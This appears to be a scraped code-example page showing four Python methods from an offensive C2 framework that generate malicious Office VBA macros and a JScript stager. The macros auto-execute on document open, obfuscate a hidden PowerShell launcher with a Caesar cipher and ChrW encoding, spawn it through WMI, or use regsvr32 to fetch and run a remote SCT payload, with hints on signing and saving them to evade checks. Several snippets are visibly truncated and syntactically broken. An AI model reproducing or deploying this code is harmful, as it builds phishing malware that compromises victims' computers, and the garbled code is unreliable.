Exemplo n.º 1
    def macro(cls, stagerParameters):
        """Creates an Office VBA macro that launches a powershell one liner command"""

        command = "powershell -NoP -sta -NonI -W Hidden -Enc "

        # Scramble the oneliner with a dumb caesar cipher :-) Simple obfuscation will do
        key = helpers.randomInt(
            0, 94
        )  # 94 is the range of printable ASCII chars (between 32 and 126)
        encryptedCommand = ""
        for char in command:
            num = ord(
            ) - 32  # Translate the working space, 32 being the first printable ASCI char
            shifted = (num + key) % 94 + 32
            if shifted == 34:
                encryptedCommand += "\"{}".format(chr(
                    shifted))  # Handling the double quote print problem in VBA
                encryptedCommand += chr(shifted)

        # Randomize VBA variable names
        varTmp = helpers.randomString(5)
        varEncryptedCommand = helpers.randomString(5)
        varEncodedCommand = helpers.randomString(5)
        varFinalCommand = helpers.randomString(5)
        varFlag = helpers.randomString(5)
        varKey = helpers.randomString(5)
        varObjWMI = helpers.randomString(5)
        varObjStartup = helpers.randomString(5)
        varObjConfig = helpers.randomString(5)
        varObjProcess = helpers.randomString(5)

        parameters = {'varTmp':varTmp,'varEncryptedCommand':varEncryptedCommand,'encryptedCommand':encryptedCommand,\

        macro = helpers.convertFromTemplate(parameters, 'templates/macro.tpl')

            with open('stagers/macro.vb', 'w+') as f:
                print helpers.color(
                    "[+] Macro stager saved in [stagers/macro.vb]")
                print helpers.color(
                    "[*] Hint: Use this VBA macro in Excel, sign it even with a self-signed certificate, and save it in format 'Excel 97-2003'"
        except IOError:
            print helpers.color(
                "[!] Could not write stager file [stagers/macro.vb]")
Exemplo n.º 2
    def jscript(cls, stagerParameters):
        """Creates an JScript script that launchs a serialized version of the agent, thx to DotNetToJscript method"""

        # Randomize JS variable names
        varTmp = helpers.randomString(5)
        varEncodedCommand = helpers.randomString(5)
        varFinalCommand = helpers.randomString(5)
        varFlag = helpers.randomString(5)
        varExec = helpers.randomString(5)

        caesarKey = helpers.randomInt(0, 94)
        varWebDavServer = helpers.randomString(4)
        webDavServer = cls.caesar('js', caesarKey,
        funcInvertCaesar = helpers.randomString(10)
        varEntryClass = helpers.randomString(4)
        entryClass = cls.caesar('js', caesarKey, "C2_Agent")
        memoryStream = cls.caesar('js', caesarKey, "System.IO.MemoryStream")
        binaryFormatter = cls.caesar(
            'js', caesarKey,
        arrayList = cls.caesar('js', caesarKey, "System.Collections.ArrayList")

        parameters = {  'caesarKey' : caesarKey, 'varWebDavServer': varWebDavServer, 'webDavServer': webDavServer, \
            'funcInvertCaesar': funcInvertCaesar, 'varEntryClass': varEntryClass, 'entryClass': entryClass, \
            'memoryStream': memoryStream, 'binaryFormatter': binaryFormatter, 'arrayList': arrayList \

        macro = helpers.convertFromTemplate(parameters,

            with open('stagers/agent.js', 'w+') as f:
                print helpers.color(
                    "[+] Macro stager saved in [stagers/agent.js]")
        except IOError:
            print helpers.color(
                "[!] Could not write stager file [stagers/agent.js]")
Exemplo n.º 3
    def macro(cls, stagerParameters):
        """Creates an Office VBA macro that launches a powershell one liner command"""

        # First generate the powershell one liner
        oneLiner = cls.oneLiner(stagerParameters)

        # Scramble the oneliner with a dumb caesar cipher :-) Simple obfuscation will do
        key = helpers.randomInt(
            0, 94
        )  # 94 is the range of printable ASCII chars (between 32 and 126)
        scrambledOneliner = ""
        for char in oneLiner:
            num = ord(
            ) - 32  # Translate the working space, 32 being the first printable ASCI char
            shifted = (num + key) % 94 + 32
            if shifted == 34:
                scrambledOneliner += "\"{}".format(chr(
                    shifted))  # Handling the double quote print problem in VBA
                scrambledOneliner += chr(shifted)

        # Split this scrambled oneliner is 50 chars long chunk of strings
        chunks = list(helpers.chunks(scrambledOneliner, 50))

        # This is the actual VBA code to launch powershell using WMI services
        # Variable's names are randomized
        varKey = helpers.randomString(5)
        varStr = helpers.randomString(5)
        varObjWMI = helpers.randomString(5)
        varObjStartup = helpers.randomString(5)
        varObjConfig = helpers.randomString(5)
        varObjProcess = helpers.randomString(5)

        payload = "\tDim {} As String\n".format(varStr)
        payload += "\t{} = \"".format(varStr) + str(chunks[0]) + "\"\n"
        for chunk in chunks[1:]:
            payload += "\t{} = {} + \"".format(varStr,
                                               varStr) + str(chunk) + "\"\n"

        # Auto opening functions for both Word and Excel
        macro = "Sub Auto_Open()\n"
        macro += "\tComputeTable\n"
        macro += "End Sub\n\n"
        macro = "Sub AutoOpen()\n"
        macro += "\tComputeTable\n"
        macro += "End Sub\n\n"
        macro += "Sub Document_Open()\n"
        macro += "\tComputeTable\n"
        macro += "End Sub\n\n"
        macro += "Sub Workbook_Open()\n"
        macro += "\tComputeTable\n"
        macro += "End Sub\n\n"

        macro += "Public Function ComputeTable() As Variant\n"
        macro += "\tDim {} As Integer\n".format(varKey)
        macro += "\t{} = {}\n".format(varKey, key)
        macro += payload

        # Payload decryption stub = inverse caesar
        macro += "\tDim i, n, s As Integer\n"
        macro += "\tFor i = 1 To Len({})\n".format(varStr)
        macro += "\t\tn = Asc(Mid({}, i, 1))\n".format(varStr)
        macro += "\t\ts = n - {}\n".format(varKey)
        macro += "\t\tIf s < 32 Then\n"
        macro += "\t\t\ts = s + 94\n"
        macro += "\t\tEnd If\n"
        macro += "\t\tMid({}, i, 1) = Chr(s)\n".format(varStr)
        macro += "\tNext\n"

        # WMI Process instantiation stub
        #macro += "\tSet {} = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n".format(varObjWMI)
        # Somehow hidden like this:
        macro += "\tSet {} = GetObject(ChrW(119) & ChrW(105) & ChrW(110) & ChrW(109) & ChrW(103) & ChrW(109) & ChrW(116) & ChrW(115) _\n".format(
        macro += "\t\t& ChrW(58) & ChrW(92) & ChrW(92) & ChrW(46) & ChrW(92) & ChrW(114) & ChrW(111) & ChrW(111) & ChrW(116) & ChrW(92) _\n"
        macro += "\t\t& ChrW(99) & ChrW(105) & ChrW(109) & ChrW(118) & ChrW(50))\n"

        #macro += "\tSet {} = {}.Get(\"Win32_ProcessStartup\")\n".format(varObjStartup, varObjWMI)
        # Somehow hidden like this:
        macro += "\tSet {} = {}.Get(ChrW(87) & ChrW(105) & ChrW(110) & ChrW(51) & ChrW(50) & ChrW(95) & ChrW(80) & ChrW(114) & ChrW(111) _\n".format(
            varObjStartup, varObjWMI)
        macro += "\t\t& ChrW(99) & ChrW(101) & ChrW(115) & ChrW(115) & ChrW(83) & ChrW(116) & ChrW(97) & ChrW(114) & ChrW(116) _\n"
        macro += "\t\t& ChrW(117) & ChrW(112))\n"

        macro += "\tSet {} = {}.SpawnInstance_\n".format(
            varObjConfig, varObjStartup)
        macro += "\t{}.ShowWindow = 0\n".format(varObjConfig)

        #macro += "\tSet {} = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n".format(varObjProcess)
        # Somehow hidden like this:
        macro += "\tSet {} = GetObject(ChrW(119) & ChrW(105) & ChrW(110) & ChrW(109) & ChrW(103) & ChrW(109) & ChrW(116) & ChrW(115) _\n".format(
        macro += "\t\t& ChrW(58) & ChrW(92) & ChrW(92) & ChrW(46) & ChrW(92) & ChrW(114) & ChrW(111) & ChrW(111) & ChrW(116) & ChrW(92) _\n"
        macro += "\t\t& ChrW(99) & ChrW(105) & ChrW(109) & ChrW(118) & ChrW(50) & ChrW(58) & ChrW(87) & ChrW(105) & ChrW(110) & ChrW(51) _\n"
        macro += "\t\t& ChrW(50) & ChrW(95) & ChrW(80) & ChrW(114) & ChrW(111) & ChrW(99) & ChrW(101) & ChrW(115) & ChrW(115))\n"

        macro += "\t{}.Create {}, Null, {}, intProcessID\n".format(
            varObjProcess, varStr, varObjConfig)
        macro += "End Function\n"

            with open(cfg.defaultPath['macroStager'], "w+") as f:
                print helpers.color("[+] Macro stager saved in [{}]".format(
                print helpers.color(
                    "[*] Hint: Use this VBA macro in Excel, sign it even with a self-signed certificate, and save it in format 'Excel 97-2003'"
        except IOError:
            print helpers.color("[!] Could not write stager file [{}]".format(
Exemplo n.º 4
    def macro_sct(cls, sctUrl):
        """Creates an Office VBA macro that uses the regsvr32.exe JScript code execution trick from @subTee to load an SCT file stager"""

        # The shell command to be executed. It spawns a regsvr32.exe process to download the SCT stager from a URL and executed it
        shellCommand = "regsvr32.exe /s /n /u /i:" + sctUrl + " scrobj.dll"

        # Scramble the shell command with a dumb caesar cipher :-) Simple obfuscation will do
        key = helpers.randomInt(
            0, 94
        )  # 94 is the range of printable ASCII chars (between 32 and 126)
        scrambledShellCommand = ""
        for char in shellCommand:
            num = ord(
            ) - 32  # Translate the working space, 32 being the first printable ASCI char
            shifted = (num + key) % 94 + 32
            if shifted == 34:
                scrambledShellCommand += "\"{}".format(chr(
                    shifted))  # Handling the double quote print problem in VBA
                scrambledShellCommand += chr(shifted)

        # Variable's names are randomized
        varStr = helpers.randomString(5)
        varKey = helpers.randomString(5)

        # Auto opening functions for both Word and Excel
        macro = "Sub Auto_Open()\n"
        macro += "\tComputeTable\n"
        macro += "End Sub\n\n"
        macro = "Sub AutoOpen()\n"
        macro += "\tComputeTable\n"
        macro += "End Sub\n\n"
        macro += "Sub Document_Open()\n"
        macro += "\tComputeTable\n"
        macro += "End Sub\n\n"
        macro += "Sub Workbook_Open()\n"
        macro += "\tComputeTable\n"
        macro += "End Sub\n\n"

        macro += "Public Function ComputeTable() As Variant\n"
        macro += "\tDim {} As String\n".format(varStr)
        macro += "\t{} = \"{}\"\n".format(varStr, scrambledShellCommand)

        macro += "\tDim {} As Integer\n".format(varKey)
        macro += "\t{} = {}\n".format(varKey, key)

        # scrambled shell Command decryption stub = inverse caesar
        macro += "\tDim i, n, s As Integer\n"
        macro += "\tFor i = 1 To Len({})\n".format(varStr)
        macro += "\t\tn = Asc(Mid({}, i, 1))\n".format(varStr)
        macro += "\t\ts = n - {}\n".format(varKey)
        macro += "\t\tIf s < 32 Then\n"
        macro += "\t\t\ts = s + 94\n"
        macro += "\t\tEnd If\n"
        macro += "\t\tMid({}, i, 1) = Chr(s)\n".format(varStr)
        macro += "\tNext\n"

        macro += "\tresult = Shell({}, 0)\n".format(varStr)
        macro += "End Function\n"

            with open(cfg.defaultPath['macroStager'], "w+") as f:
                print helpers.color("[+] Macro stager saved in [{}]".format(
                print helpers.color(
                    "[*] Hint: Use this VBA macro in Excel, sign it even with a self-signed certificate, and save it in format 'Excel 97-2003'"
        except IOError:
            print helpers.color("[!] Could not write stager file [{}]".format(